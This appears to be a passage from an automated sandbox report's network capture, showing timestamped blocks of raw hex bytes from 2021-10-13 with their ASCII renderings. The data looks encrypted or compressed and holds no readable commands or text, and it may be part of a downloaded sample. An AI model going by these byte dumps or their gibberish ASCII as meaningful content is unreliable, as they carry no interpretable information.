                                                                      2021-10-13 16:06:31 UTC76INData Raw: 68 eb fc 1e 97 10 7d 3f a7 a1 4d ce 44 03 b8 d9 52 69 53 cb dd ea 2b 30 51 08 fa ae 3f c1 2f 75 c0 a9 84 39 86 a6 2d 4d b0 fe dc d2 a6 48 d4 e8 fb de 61 68 e8 7c 1f 23 b7 9a 16 90 15 ea 17 48 02 4f 52 88 75 94 92 d9 eb c2 1a 7d 44 67 91 84 8a 2c 01 b9 08 08 f7 6f ee 6e 69 e8 00 95 d1 a0 58 af d5 bf 43 02 31 02 e9 74 71 dd 54 37 e3 7f 8c 6f 9a 14 eb b8 b7 4e 6b 15 0b e5 c0 dc fe 60 de f4 0d 3a 37 98 ee 76 be 4c 5e 9e 40 59 54 89 8b 67 e3 51 59 e2 7e ea 2a 60 c3 67 0f 85 f1 b7 97 59 85 c1 62 92 83 52 e1 54 82 fe cf 32 1d 56 cb 38 67 1a da 86 7d b9 56 b0 57 23 df 01 5a 82 6c 29 65 94 0a ca 37 08 33 02 9a 1c 9c 98 01 d1 ef cd b1 d7 64 47 4b 81 82 71 03 b1 4e 3e b1 97 22 52 bd 24 9e 41 56 da c3 ce ae 88 fd 7d f6 3a b7 ae b3 80 1f 2b bf 4f 00 9d 0d d3 11 99 a5
                                                                      Data Ascii: h}?MDRiS+0Q?/u9-MHah|#HORu}Dg,oniXC1tqT7oNk`:7vL^@YTgQY~*`gYbRT2V8g}VW#Zl)e73dGKqN>"R$AV}:+O
                                                                      2021-10-13 16:06:31 UTC77INData Raw: 29 07 28 45 ab bd 59 7f 2a 23 b7 86 7f d2 54 10 e8 26 a3 f0 b7 ed 7a 05 55 12 78 8d 77 5d 04 04 66 5a 08 de 5b f2 66 d3 65 46 2b ac 8c de 31 fc 83 5f d3 21 4d 43 1e 44 23 c8 a9 7e aa 4b 77 94 2d 41 7e 42 45 03 a9 84 af b4 d2 dc 41 2e 2f fb 94 fb 71 e1 e5 4e 69 8a de fe ef fc 4a b5 bf c7 95 3c 67 b2 fd be 80 72 1a c7 e2 ec 14 a7 8b 9e 38 af 64 58 8d f9 b4 b8 fe df b1 09 20 c8 0e 33 15 8a ad 86 a2 82 6d 5e 2c 11 0e 71 b1 11 95 d3 5f cd 9d 96 15 28 bd e2 15 45 fd 3f ba c1 ab c2 4f d6 6b 33 0c 12 60 f3 6c 1c b0 8f 64 9c 4f bb 6f ab be 6d ac 08 62 11 3c 91 f7 c7 32 3d 7d f8 ae e4 54 46 ea c2 99 9b 1e 6f f4 67 54 35 9e 3f 11 5a 1a ce 34 d4 d4 18 61 42 48 03 97 c9 f6 e7 51 f8 af 03 d2 82 47 01 ca b5 f4 8a 6a 05 e5 85 ca 75 d7 69 76 46 ab a5 60 ff 73 1d f1 6d 13
                                                                      Data Ascii: )(EY*#T&zUxw]fZ[feF+1_!MCD#~Kw-A~BEA./qNiJ<gr8dX 3m^,q_(E?Ok3`ldOomb<2=}TFogT5?Z4aBHQGjuivF`sm
                                                                      2021-10-13 16:06:31 UTC79INData Raw: 08 3a 17 8c cf 96 9c 37 ec f3 c9 c2 f1 79 51 4c fb 89 1a ac b1 62 3c ca d8 3a 5f bb 2f 82 65 ea de ef c0 f9 a1 fd 7d fc 4a 81 a2 b3 8f 02 4e 03 4f 2c 89 0a d3 19 99 a5 89 9a 2a 1d 62 43 3c b6 db 92 95 fe 54 61 f3 2e f5 10 b6 9f 62 ba da f2 dd 56 75 3e 0d 12 a9 99 e3 24 b5 df 8c 77 12 c6 65 97 ae 72 ca 6a 6a 4f 5b 39 e9 85 cf e2 31 01 1f 47 d8 a6 85 6c 0e aa 3e ea e0 9c f0 84 00 f4 7e 73 04 cb b1 41 64 13 43 f8 a9 25 8b f7 5a d5 10 da 7d 27 af 81 8e 56 af 2a 76 54 35 91 e1 c7 be 8f b0 b1 36 2c d1 64 b4 b2 9d d8 80 e2 91 ac a5 e3 8e 34 bb 1b e2 7c d2 c9 0f 06 ff b5 82 c2 3b 14 77 41 da 61 21 86 52 48 36 88 ab 66 0b 91 24 1d 5e e0 ce fa e9 aa ad 5f ed a7 73 94 ca e5 dd dc 4d b0 f0 b2 c3 4a 55 f3 43 50 5b 96 92 5f d4 c9 c0 3c 9f 36 c0 5e 89 f7 55 d1 71 e4 6e
                                                                      Data Ascii: :7yQLb<:_/e}JNO,*bC<Ta.bVu>$werjjO[91Gl>~sAdC%Z}'V*vT56,d4|;wAa!RH6f$^_sMJUCP[_<6^Uqn
                                                                      2021-10-13 16:06:31 UTC80INData Raw: 00 0e 8e e1 6b b1 22 95 3f 8a 44 fb da 38 64 ff 1a 4a 3d 4c 67 ed d6 e5 7f 7d c5 ba 20 0a ee 47 01 52 99 eb 92 4a a6 d5 87 ca c1 d1 76 6f c8 d2 39 77 f6 62 16 04 6d 14 27 7d 0b af 53 34 64 1f 74 73 c1 63 77 c4 e2 a8 38 50 80 2c 00 59 27 bd b1 71 16 ad 07 1f a1 2b 5b f4 7d c5 28 4f e4 01 76 ad 55 3f be d0 c0 6e d4 de 3e 0a 38 ea 3f 3b ad 50 f9 72 ce 2a d8 52 ff 3a cc f8 f5 6a a6 89 1b f7 86 79 5d 23 42 de b6 89 af 5e b9 0c 47 71 ff cc d2 3a 4e cb c0 db 45 74 68 e4 fa 19 3c 9f a4 ea b8 09 e8 8b 44 37 76 42 5d 75 31 90 45 ed 7e 31 5d b2 71 9c bc 81 28 1e 95 17 26 74 78 0f 42 5a 93 4c b1 ce 8e 46 1b c7 a0 6c 28 b6 1d fb 79 ed d2 54 17 02 37 3c 7c 81 0d c4 21 b1 57 4f 1d f9 e5 c0 d6 74 26 6f c6 12 35 b4 8f fc 42 a8 63 c9 66 5e 40 7a f9 91 67 e3 cf 77 e9 48 ca
                                                                      Data Ascii: k"?D8dJ=Lg} GRJvo9wbm'}S4dtscw8P,Y'q+[}(OvU?n>8?;Pr*R:jy]#B^Gq:NEth<D7vB]u1E~1]q(&txBZLFl(yT7<|!WOt&o5Bcf^@zgwH
                                                                      2021-10-13 16:06:31 UTC81INData Raw: 9b 41 50 3d 8f ac 93 16 43 27 26 44 f1 cc ca a2 af 81 5b ee d1 58 77 c2 8d a7 c1 5e bf da 81 ca 51 d6 8e 6f 5a 5d 94 07 5f d4 d0 fc 27 8c 15 c0 4f 82 e0 45 2f 61 de 6f bf 0a 60 61 eb 18 99 c3 07 0f 4d 1c 21 54 6a c4 92 09 4b d3 37 c4 7f a7 f8 c6 90 9f 90 56 39 77 9f 90 66 eb b1 3a f4 5c cc d1 31 80 8b f7 fc db 15 0f 47 a2 bd 4f 86 3d f1 b5 bd 6e ce 5f 01 e4 21 4f 0f 9a c3 53 2c 7b c9 5e 08 e1 a2 0d 2a 4c 78 19 ed 23 9b 2f d3 61 6c 80 ac 8c dc 17 f2 a8 46 d3 29 55 bb 1f 68 3d dc dc f3 b1 4b 74 95 fb d2 53 40 57 03 b0 8f b9 42 c4 0e 42 15 26 e3 9f e3 87 f6 37 4d 6e 8a e2 11 ed 8f 39 4b be ef bd 35 67 9a 4d fc 17 72 1e e7 e5 f6 13 3a 0c 86 e2 e8 70 59 8d f5 9e b8 ef c9 a9 12 3e c8 fc 24 eb 8b 2d 84 ba 98 7b 54 11 ac 0f 54 a9 f8 9f ff 5c c3 49 8c 34 2a 9f f9
                                                                      Data Ascii: AP=C'&D[Xw^QoZ]_'OE/ao`aM!TjK7V9wf:\1GO=n_!OS,{^*Lx#/alF)Uh=KtS@WBB&7Mn9K5gMr:pY>$-{TT\I4*
                                                                      2021-10-13 16:06:31 UTC82INData Raw: 56 53 4c 11 4a f7 bf dc 9c 25 58 ee 01 c9 76 36 ac 82 8e 56 af 2a 76 54 35 f9 ea 96 c5 94 80 b6 1c e5 d1 67 c9 66 9d d8 95 ca ef 3f a5 f0 b4 20 93 1d e2 7c d8 d7 21 26 ed dd 1a e9 20 1e 66 7e 0a 60 0d 8e 5c 70 34 a4 b2 9c 74 2e 26 0a 5f f6 e1 cc 17 ab 8b 4b f5 ae 70 59 ca 9e a7 d6 90 1b d8 90 c1 4a 3b 88 30 ec 5f bc 98 54 c5 dd e3 2f 89 0d d0 4f 98 90 9c d1 60 f8 76 bc 29 69 a6 e9 01 96 bd f5 05 4d 07 39 40 66 28 98 0d 62 c0 30 c8 01 63 62 ee 2c 8a 80 47 c7 d3 8b 81 70 ec 8b 67 29 2f 76 be 15 88 86 e7 e4 b8 31 06 47 b9 a1 83 6b 2f ce ba 92 92 c5 5f 10 e8 2f 51 9e af ed 51 0d 56 4c 7e f6 18 4b 2c 2e 4c 78 00 cb 15 90 6f fb df 68 2b aa e3 01 01 fe 89 70 c2 2d 22 71 1c 44 38 f6 1d 51 b1 4d 66 ab fd 40 52 4a 4b 3b a2 8a 91 8a d7 f0 45 56 e8 fb 93 e9 88 f1 c5
                                                                      Data Ascii: VSLJ%Xv6V*vT5gf? |!& f~`\p4t.&_KpYJ;0_T/O`v)iM9@f(b0cb,Gpg)/v1Gk/_/QQVL~K,.Lxoh+p-"qD8QMf@RJK;EV
                                                                      2021-10-13 16:06:31 UTC83INData Raw: c1 2c 47 06 a8 a8 2a 5b a5 35 b1 bc f4 e7 8f a1 4a af 2e fb cb 70 e6 53 71 c5 12 bd 92 3e a3 04 e8 1e 59 d6 5d 4e 92 77 4a 56 d9 eb 65 1d ec 75 f1 9c bc 1d 71 21 39 08 01 e8 50 3c 68 6f fa dd b7 d8 b8 a4 86 ed b2 40 0a 46 db fb 79 75 5a fc 16 a8 67 ad 7a 97 2a 2c bc 9b 4a 6a 30 25 ec dc 28 e9 0c 72 de 0f 11 ac 8e f4 a0 bc 54 5d 51 de 76 44 8f bb 67 f0 63 77 f6 ce eb 20 6c 6f 6b 02 94 ee bb 93 9f 66 ed 70 96 ab 7b ed 4c 7a e9 cb 16 19 41 17 d0 5f a6 c5 91 63 b0 5f be 45 c4 20 2c 7e b1 5e a6 4e 94 15 d7 29 0d 20 0e 86 e2 8c bd 12 17 f2 e3 b4 c1 71 4d 55 88 8b 78 f4 ae 9c 3b 89 ab 2a 5b aa a1 be 4d a8 da f9 ee 67 88 ff 77 cf bf ba a3 b3 98 05 37 43 35 ea 8f 09 ff 25 0d ba f0 aa b6 83 73 4c 45 cd e1 93 93 f6 11 3c fb 3d fa 13 8f d6 7d 44 dd b1 f8 50 76 ee ee
                                                                      Data Ascii: ,G*[5J.pSq>Y]NwJVeuq!9P<ho@FyuZgz*,Jj0%(rT]QvDgcw lokfp{LzA_c_E ,~^N) qMUx;*[Mgw7C5%sLE<=}DPv
                                                                      2021-10-13 16:06:31 UTC84INData Raw: 57 0d 17 da 0b 35 df 26 91 4e 93 63 6c 21 a5 94 5b 72 c1 81 77 d9 09 0d 47 1e 4e 1a 9f a0 55 bb 42 69 15 64 2f d6 41 5d 0e 2c fe 6c 4a d3 f4 5c 0f 37 f4 93 f2 80 ff d8 b2 43 a4 cc 1f eb 0b 66 b5 bf c2 ae 16 63 3d c6 d4 80 73 36 5b e2 ec 1e 9c 88 9d 38 8d 73 d4 b2 ff b4 b9 c7 fa bb 22 31 e0 53 24 eb 81 ee 05 bb 89 6b d5 05 ef 0f 5c a0 00 81 c1 4b da 63 86 36 35 a7 1e 3f 8a af 46 aa 08 ab c6 61 fc 78 34 a7 f6 4b f3 68 34 98 9c 65 8f 75 bb 14 45 be 6d a8 ab 11 2f 2f 87 f6 fd 2c 4e 45 ed 50 ef 50 04 f0 c9 93 95 1e 07 86 74 54 22 9f 17 56 40 e4 c5 30 97 fd 1a 40 a8 5d ee 4c a6 e2 e2 7b d0 d0 d3 af ee 43 1e fc 8c fb 8a 7b 19 ca c0 34 5c fb 5e 74 d5 ba af 6b 86 fc 37 ea 6b 67 19 e3 0d ba 36 69 29 83 78 44 9e 7e 78 52 e6 cc e2 4f c1 b4 75 02 3b a2 ae c5 55 b0 18
                                                                      Data Ascii: W5&Ncl![rwGNUBid/A],lJ\7Cfc=s6[8s"1S$k\Kc65?Fax4Kh4euEm//,NEPPtT"V@0@]L{C{4\^tk7kg6i)xD~xROu;U
                                                                      2021-10-13 16:06:31 UTC86INData Raw: 85 5c a5 ea 43 d9 d6 9a f0 7d e7 2a a5 98 4d 88 2c 28 79 b2 2e 8f 09 e4 1a 8f aa 8f e4 0d 00 54 b7 52 c9 c5 90 e8 34 3b 23 f6 5d cd 11 9e d5 19 f8 de 9d ff 7c 32 36 62 4d be d9 c6 25 da 9d 92 40 07 ca 4d c7 a4 6d d6 fb 43 61 43 31 97 da e6 b8 37 2b 0b 3b 69 a5 85 42 82 95 3e e2 e1 8f e7 8d 10 cc 6a 73 12 d3 50 00 b6 10 77 fa 91 9d 99 09 5b e6 53 de 79 27 b9 96 6f 65 7d 29 71 5f 26 44 19 43 3a 90 83 a6 13 0e c2 68 d6 d2 63 d9 a8 d4 98 bd ac f2 af 3e 93 69 e2 7c d8 d0 09 2e b4 a3 89 e3 4f 96 71 56 22 ff 12 98 59 4c 36 9e b2 87 1a 43 27 26 40 e2 cf 66 06 a3 a9 07 c6 a5 52 18 4a 9f a1 da 5e b3 c5 81 d2 46 28 9e 4c 4f 7f 42 93 73 f5 d3 e1 37 96 0f c9 c8 96 f3 3f 0b 0c d1 65 ae 02 77 b7 f8 10 c6 89 3c 95 4d 0d 20 f2 fe 25 b2 36 5b c2 21 cd 71 8e 9c ef 0a 92 a8
                                                                      Data Ascii: \C}*M,(y.TR4;#]|26bM%@MmCaC17+;iB>jsPw[Sy'oe})q_&DC:hc>i|.OqV"YL6C'&@fRJ^F(LOBs7?ew<M %6[!q
                                                                      2021-10-13 16:06:31 UTC87INData Raw: a0 f8 b9 00 e2 9c e3 99 65 16 c4 88 d5 10 29 68 5a d5 80 a0 49 71 8b c9 15 47 14 27 e1 16 80 4f 2b 5a 84 72 6c 6b 7c 78 49 e6 cc e3 4f c1 b4 05 c2 a8 bd a9 ad 54 b4 18 3f 4e 28 28 ca e3 c3 3d 76 91 09 d5 a9 4a 14 89 84 5e 68 c1 d4 5f 84 38 e0 27 c8 2f 4e da 54 58 14 da 52 69 42 91 de ea 2b 12 cc 06 d2 93 b3 21 25 5d f9 a5 92 3e 5a dd e0 67 b0 fb e0 97 a4 33 1f e8 fb cf fa df e9 64 1d 58 7d 84 14 bc 7d 69 17 42 29 5e 19 40 75 31 94 57 5c ed 25 7d 55 70 94 94 2e 2f 01 b3 20 5b e8 7e 1a 78 93 6b fa b7 d1 a2 72 cd c3 bf 49 7c 1e 1d fb 62 0c 1f 4b 27 19 55 b3 78 96 14 88 bd b7 42 6a eb a8 cf c0 d6 ea 5d bb f5 0d 3e 3e 81 cb 2c b7 53 5f 73 50 66 5c 61 00 62 e3 53 73 f5 0d d4 22 6c d6 75 68 f6 c7 aa 9a ad ac ad 72 96 a1 7b e2 4c 5c 9b a3 1e 1d 5c e9 6e 56 a4 cf
                                                                      Data Ascii: e)hZIqG'O+Zrlk|xIOT?N((=vJ^h_8'/NTXRiB+!%]>Zg3dX}}iB)^@u1W\%}Up./ [~xkrI|bK'UxBj]>>,S_sPf\abSs"luhr{L\\nV
                                                                      2021-10-13 16:06:31 UTC88INData Raw: db 90 c1 4b 53 47 43 50 5b cf ac 5d d4 d0 e9 54 ec 21 c2 5e 83 d7 12 d3 60 f8 73 ee 0f 76 b7 f8 12 fd 19 14 04 49 04 3b 4d b7 b5 b9 25 54 c0 4b 12 6e af 66 ff 2b b3 d9 52 11 ca 99 eb a6 fd 99 51 f2 2f f4 bc 15 88 9a f9 90 e8 04 04 4d 9b f6 5b 78 36 cc b2 d9 39 c7 5f 1a c7 7e 5f f1 91 c7 10 05 7e fb 6b f3 0f 50 8b 29 4c 78 08 a6 eb 9b 66 d7 d6 03 3f ad 8c c7 a3 c6 2c 77 d3 21 4f 3e d5 44 32 da ab 44 b7 9d ff a9 d3 40 50 3b 8d 08 a9 87 a8 47 fb b7 42 39 2e f9 e8 25 8f e0 cd 4b 31 b6 f7 1d e7 96 28 c6 80 c1 bf 14 4d f1 82 d4 8a 63 1a 9e a6 ee 14 be 93 dc 3a 87 6e 70 cc fd b4 b2 fe cc ab 2f b4 e1 09 24 e9 f0 4c 84 ba 8d da 36 2e ee 0f 57 11 2d ca d1 23 1e 63 97 3d 23 87 e6 e8 29 d5 44 d1 c3 d0 16 65 f4 6d 21 7c 7b 67 80 56 34 b0 85 75 87 0c 86 6d 83 b4 45 ec
                                                                      Data Ascii: KSGCP[]T!^`svI;M%TKnf+RQ/M[x69_~_~kP)Lxf?,w!O>D2D@P;GB9.%K1(Mc:np/$L6.W-#c=#)Dem!|{gV4umE
                                                                      2021-10-13 16:06:31 UTC89INData Raw: dd ff b0 5c fe 1c 33 3f 13 cb 67 b7 53 5f 73 44 5d 4b 59 91 6d 41 55 60 f2 e4 fe 08 a1 d8 6b 04 92 75 af 9a a7 85 fe 7a 87 a1 7c cc 9a 80 e8 e1 be 0c 5c d5 3a 40 8c 66 88 70 b3 49 23 73 dd de 2c 44 92 b1 2a 65 9e 39 d4 11 4d 38 1f f4 2e 9d b4 0d 9d 72 cf b1 d6 6a 55 51 57 06 7c fd b0 63 12 ef 99 3b 55 c9 0c 81 4d b3 a6 23 c6 96 8d fd 06 3a 25 ba a7 a2 8d 06 30 45 d4 04 13 09 fb 2c 3e b4 8b e2 d4 0c 66 58 57 f4 d2 ac de 02 c4 dc f0 2c 88 da 9e df 63 bd 53 b6 f5 54 77 4f b7 47 a8 9d f2 4c 00 9f f6 b0 14 c5 49 b8 73 c8 a3 83 43 4d 5d 19 86 c1 fe e0 37 01 01 54 e8 a2 85 44 1f bc 35 c9 fb 9c e6 85 f5 de 49 71 1b d7 4f 47 5e ef 5a df ab 35 96 09 5c e1 ec cc 5a 25 83 9b 5b b4 81 53 96 56 1e 76 6d 0b ef 8f b0 a6 2c 0d d3 12 c9 c9 9d d0 84 c8 80 ba ae db e5 36 bc
                                                                      Data Ascii: \3?gS_sD]KYmAU`kuz|\:@fpI#s,D*e9M8.rjUQW|c;UM#:%0E,>fXW,cSTwOGLIsCM]7TD5IqOG^Z5\Z%[SVvm,6
                                                                      2021-10-13 16:06:31 UTC91INData Raw: de 29 3d eb 89 81 96 b1 a1 f9 58 3a e9 1c 54 93 07 9f d3 58 58 48 97 39 2b 85 ed 1e a7 fe 44 d1 4c 80 c6 65 f5 7a 37 60 72 48 4c 6a 36 b6 99 72 9c 6c ab 7c 92 b3 4d ac ac 62 11 3e 93 ee f8 01 ab 7b ef 56 f6 71 55 f9 e1 48 98 08 97 e3 5d 45 36 87 2b 07 45 c4 cf 19 d6 ff 09 59 b3 59 50 6d c8 f6 e5 68 d3 de 22 ad ee 41 12 c6 8e fc 9b 66 79 fd 85 ca 5b c1 7a 73 c1 ba a8 ff 5e 6f ec f9 78 07 29 ca 19 a1 45 3a 25 12 64 42 cf 6d 7d 4f 32 a4 20 5e cf a7 d0 55 37 b3 aa fc 05 83 fe 2e 41 5f da f4 e1 c2 26 6a ec a0 fd 7d c7 35 a1 c4 5d 40 81 fe 1e 8c 4c f8 3f a7 b0 5c d7 43 23 02 9f 53 63 36 c2 d1 85 39 3b 8f 0e bd bd 3d c1 23 4b eb ac 90 20 5e b0 3a 60 3e 48 db 08 b5 5e c7 e7 d0 e2 65 6f f5 69 8e 35 98 a3 05 be 18 ef 06 4d b9 43 6d ea 5d db 91 d9 e1 49 ce 7c 55 7b
                                                                      Data Ascii: )=X:TXXH9+DLez7`rHLj6rl|Mb>{VqUH]E6+EYYPmh"Afy[zs^ox)E:%dBm}O2 ^U7.A_&j}5]@L?\C#Sc69;=#K ^:`>H^eoi5MCm]I|U{
                                                                      2021-10-13 16:06:31 UTC92INData Raw: 96 87 a4 65 73 02 f4 54 41 48 1b 28 a5 ab 22 97 73 52 ee c8 da a0 aa 83 99 70 56 90 2d 5e 52 0f 77 f2 b9 4b 38 a2 b6 0a 26 ba 67 c9 cf 8e dc 95 cc 87 52 a6 fb b9 1a ac 1b 31 78 d2 c7 1e 02 62 d8 89 e9 21 3c 6b 57 24 6a 7e d2 48 43 3c f5 ac 9d 20 bd 26 0a 46 d0 cc e2 d3 aa 81 5d 06 a5 58 66 de 8d ab e4 f8 b5 da 90 c1 58 22 90 57 ae 5e 90 80 4e d1 cc f9 36 8e 1b 4e e9 a1 ca 54 d1 6a ed 70 bd 08 77 a6 f2 0e 78 d3 38 02 66 00 35 42 72 30 93 34 5e dd 3a 3c 6f 83 68 ff 20 8c 46 43 17 df 90 83 6a fd 88 5f e8 a2 cb 92 1f 93 8f cb e8 d6 06 04 59 a0 bc 59 69 36 c4 48 ab 51 c3 5c 03 e8 24 4e fb 9b fe 5b 18 69 0f 7b da 11 4c 0c 11 45 f6 bd e2 02 9a 66 d3 7e 74 38 a6 8c dc 0b e1 95 89 d2 0d 47 54 16 53 e4 cd aa 4a a6 58 7a 83 c2 4a 45 be 5c 24 aa 9b aa 40 d3 e1 49 26
                                                                      Data Ascii: esTAH("sRpV-^RwK8&gR1xb!<kW$j~HC< &F]XfX"W^N6NTjpwx8f5Br04^:<oh FCj_YYi6HQ\$N[i{LEf~t8GTSJXzJE\$@I&
                                                                      2021-10-13 16:06:31 UTC93INData Raw: 33 3a 9d 01 c0 9a 17 6d 24 5d fe 90 83 31 58 a6 03 d7 b1 ff ca c1 a0 59 d2 ea 80 12 74 68 e0 64 64 ff b6 84 10 ae 93 93 c8 42 28 58 0d 15 74 31 96 db 90 bd 1a 7d 51 67 06 c7 fd 2e 01 bd 67 69 ea 7e 1a b1 0d c3 f8 80 d1 a0 50 94 c9 bc 52 00 15 72 fb 79 77 fc 9e 23 1d 78 88 d5 9f 3c d4 9b a1 5b 7a 15 1d e5 c0 dc 36 03 55 dd 3a 3a 28 83 f0 7f b4 73 54 60 41 f5 72 8c 95 67 e5 7b de f7 7e ec 06 7a cf 6c 2a bd f8 a8 90 79 84 fc 77 af 2d 6b e4 54 92 ea 9c c0 1d 56 c5 a0 e3 b3 1f 9f aa aa 50 bc 47 e5 11 2d 52 ba 42 50 b9 94 15 d2 2b 03 a0 0e 82 e0 e6 68 09 e9 f7 de ba c0 ad cb 55 8d 89 12 20 b0 62 3e 89 d5 2a 59 ac 21 95 65 7e df ef c0 80 04 f8 7d f6 24 ae b7 a7 a1 a3 21 41 44 04 13 09 fb 2c 8d a9 9b dd bc 1d 62 4f 45 68 dd 92 93 fd 2f 37 e6 06 50 13 9e d5 4f e0
                                                                      Data Ascii: 3:m$]1XYthddB(Xt1}Qg.gi~PRryw#x<[z6U::(sT`Arg{~zl*yw-kTVPG-RBP+hU b>*Y!e~}$!AD,bOEh/7PO
                                                                      2021-10-13 16:06:31 UTC95INData Raw: 65 05 7e fb 65 cc 71 b6 05 00 46 6b 06 cc 2a 8e 5d 51 61 6c 2b aa 9d c3 6e ca 81 77 d9 37 5c 49 71 ab 32 de a8 3a db 49 70 89 c0 4d 43 4d 75 b4 ab 83 bf 51 bc 9b 41 39 2e d7 a5 e5 9e ee a6 78 40 88 ff 0c e1 90 f6 da b7 c2 bf 14 0a db 82 d4 8a 7e 0f e6 ca c2 17 b4 bd f3 54 85 64 52 ab ee bf be fe c7 d5 16 39 c8 03 4b 87 89 81 8e 9c a2 4b 48 37 c7 7e 5d b3 00 b3 ce 49 de 4b b9 3a 2a 90 8f 52 a4 ff 4e f7 d0 a0 c0 74 fa 06 04 73 79 6a 9c 04 34 b0 85 42 9e 71 ae b9 90 b0 7c a2 bc 7b 2f 7b 78 03 13 21 10 4a fe 5b cd a3 40 f2 cf f6 f0 0a 91 ff 6d 47 29 84 35 02 6a 58 cd 18 d0 e9 97 4d a1 4a 79 ef dd e2 cb d8 da ad 0a 87 ff 47 01 c4 f0 99 88 6a 1c f3 96 c1 75 f3 6a 76 d1 c4 c9 73 e9 72 10 e4 68 05 2c 8e df b0 48 21 7a 8d 76 2a f1 75 7c 78 5f b6 25 4f 95 9b 02 42
                                                                      Data Ascii: e~eqFk*]Qal+nw7\Iq2:IpMCMuQA9.x@~TdR9KKH7~]IK:*RNtsyj4Bq|{/{x!J[@mG)5jXMJyGjujvsrh,H!zv*u|x_%OB
                                                                      2021-10-13 16:06:31 UTC96INData Raw: 3a e3 9b 3b 5f bd 2d 81 4d aa f3 f8 c6 96 83 fd 6b 8b c4 ba a3 b7 8a 28 ae 40 4e 26 a3 02 d3 08 9e a5 89 86 24 1d 62 43 29 e1 cc a0 9b f8 1b dc 0d 2e f3 22 95 f7 49 b8 dc 9b 86 03 74 34 68 3d aa 9a 98 f9 da 9d 89 75 10 b8 ad d6 ab 76 e6 05 42 5e 6b 30 86 97 ce e2 37 2b 01 54 e8 a6 86 40 26 18 3f e2 e6 99 c9 1d 0a df 6f 5f 08 f4 61 42 48 17 28 d5 ab 22 97 73 55 fd 3a 42 77 27 a2 b5 7b 7f ad 2a 5d 50 6d 54 e1 bc cf f5 b2 a2 61 ef d3 67 cd cb 98 d6 80 e0 e9 ac a5 f6 c3 d4 bb 33 e6 56 d2 c1 0f 15 de a7 89 23 20 14 70 56 24 60 0d 86 62 54 36 8f b7 9a 1c c0 ca 0a 55 e4 cb f4 6a 46 81 5d c2 a7 5b 0a 2d 9e a1 d8 4f b0 a7 76 c1 49 2c 8d 63 50 1f bd 92 d2 ff da f0 3f e2 f9 c0 5e 8d fd 26 a2 62 f2 6f d3 e1 77 b7 fc 12 fd 31 14 04 49 0f 45 04 60 3a 99 27 27 b1 32 c2
                                                                      Data Ascii: :;_-Mk(@N&$bC)."It4h=uvB^k07+T@&?o_aBH("sU:Bw'{*]PmTag3V# pV$`bT6UjF][-OvI,cP?^&bow1IE`:''2
                                                                      2021-10-13 16:06:31 UTC97INData Raw: c8 f6 e5 08 a6 af 00 a5 9d 3a 03 ce 95 f8 97 79 13 d5 96 cf 4a 29 68 5a d4 b3 b6 74 e9 69 33 f0 93 15 0b eb 0b b7 35 c0 2b 83 76 77 ce 79 78 49 e1 a9 db 4e ed a7 01 63 c7 a5 12 ec 10 b4 6b 43 4e 2b 51 87 9c c1 37 65 f6 65 e3 b8 4f 1e b0 c1 45 96 ca d0 15 85 3a 99 8b a6 ab 49 d1 48 38 2f d8 43 66 27 2d dd c6 2b 3d 89 79 39 99 3f c5 39 4e fd a9 95 36 45 58 2a 4b b9 f7 a3 a9 a4 48 de f6 e8 ce 74 79 e1 70 e1 22 9a 87 03 ab 0c e8 06 47 37 56 9c 8a 59 33 bb dc d3 4e e5 82 aa 5b 82 be 06 1e 03 b9 33 01 e8 7e dd 6f 45 f7 c4 bc c5 aa 59 81 b5 28 43 08 3c 0e ff 6b 75 fc 06 26 1d 74 b1 7e 94 10 d5 bb c3 df 7d 3d 24 cf c3 fe 96 22 70 ff 1b a0 23 57 ed 53 9f 64 55 60 4b 78 72 61 91 67 e9 8d 71 f1 54 ea 21 7c dc 6b 02 85 d8 a8 91 8c 84 e3 e5 96 ab 6b 0e 56 ac ff e7 1c
                                                                      Data Ascii: :yJ)hZti35+vwyxINckCN+Q7eeOE:IH8/Cf'-+=y9?9N6EX*KHtyp"G7VY3N[3~oEY(C<ku&t~}=$"p#WSdU`KxragqT!|kkV
                                                                      2021-10-13 16:06:31 UTC98INData Raw: d7 cb d0 c1 a1 ea 4a ee 65 30 79 66 69 0d 69 1a ba 88 60 f2 6c b8 6f 87 a1 67 a0 ad 6a 0b d3 86 d0 e1 2e 43 e9 ef 50 ef 05 4b f3 c9 9d 87 04 91 fd 57 a8 23 b9 36 11 41 99 c0 19 d6 fb 07 46 a1 42 63 05 c8 da e7 50 f3 b1 0c af e6 59 ff cf b3 fe 8d 72 6b c7 86 ca 59 c8 60 7a d7 a3 bd 8f e8 54 3e 99 d6 15 27 e7 06 a9 44 2b 23 9e 8c 6d f1 75 7f 5a 99 b9 24 4f c5 ae 0a 46 31 b5 5a ec 3c b0 00 33 4c 23 4d 0a e0 ef 35 78 f7 7a e2 b4 40 e0 a0 e8 5e 43 ce c4 43 79 c7 15 38 8d b8 7f d9 52 8a 2a d8 52 b2 3c d3 cd fc 32 3e b7 96 d2 99 3f c1 34 59 e4 57 85 1f 54 a4 32 61 c3 a6 cc d2 ac 44 c9 fb ff cb 65 6c fa 98 1e 0f bd 8d 16 c5 04 e9 17 46 37 55 71 8f 75 20 94 c4 15 60 36 71 5d 72 8a 94 de 2f 01 bf 05 1f fb 7a 10 7e 41 f1 2e b6 fd a3 42 94 c5 bf 52 0c 27 e3 fa 55 74
                                                                      Data Ascii: Je0yfii`logj.CPKW#6AFBcPYrkY`zT>'D+#muZ$OF1Z<3L#M5xz@^CCy8R*R<2>?4YWT2aDelF7Uqu `6q]r/z~A.BR'Ut
                                                                      2021-10-13 16:06:31 UTC99INData Raw: 5c 56 1a 64 e1 c7 d5 8e b0 b1 92 b9 bc ce c9 c9 97 c5 97 cd 91 bd a0 ef b0 c8 ba 1f ed 7e a9 d1 0e 06 ea 9a 95 16 df eb 6f 59 37 65 0d 95 4f 5c 3d 71 bc b4 1f ba 24 71 5b e1 c9 e6 78 2d 83 5d cc ac 82 cf 1f 95 be d0 5e b1 da 81 c4 56 3e 71 42 7c 54 be 86 22 da db f0 3a 80 09 d3 5b 89 ee 50 cf 9e f3 49 a7 3a 52 48 07 ef 99 db 07 01 4d 1c 2f 54 75 c4 92 09 5b c0 4b cc 6f af 66 81 d1 9b 90 5a 0e d5 88 95 60 ec 9c 4a e5 a2 cb 92 1c ba b5 0e 1c 28 19 15 54 b6 b6 48 7d 23 d1 48 ab 51 cd 57 07 39 32 42 fc 88 ea 51 16 7b ec 84 f7 32 49 12 02 37 74 0b dd 22 f4 ec d1 61 66 3c 76 9f c9 0d e0 90 72 d3 30 48 5e e0 45 1e d5 a0 2e a1 4a 70 87 ff 9c 4e 53 58 08 b8 86 af b4 d2 dc 40 2e 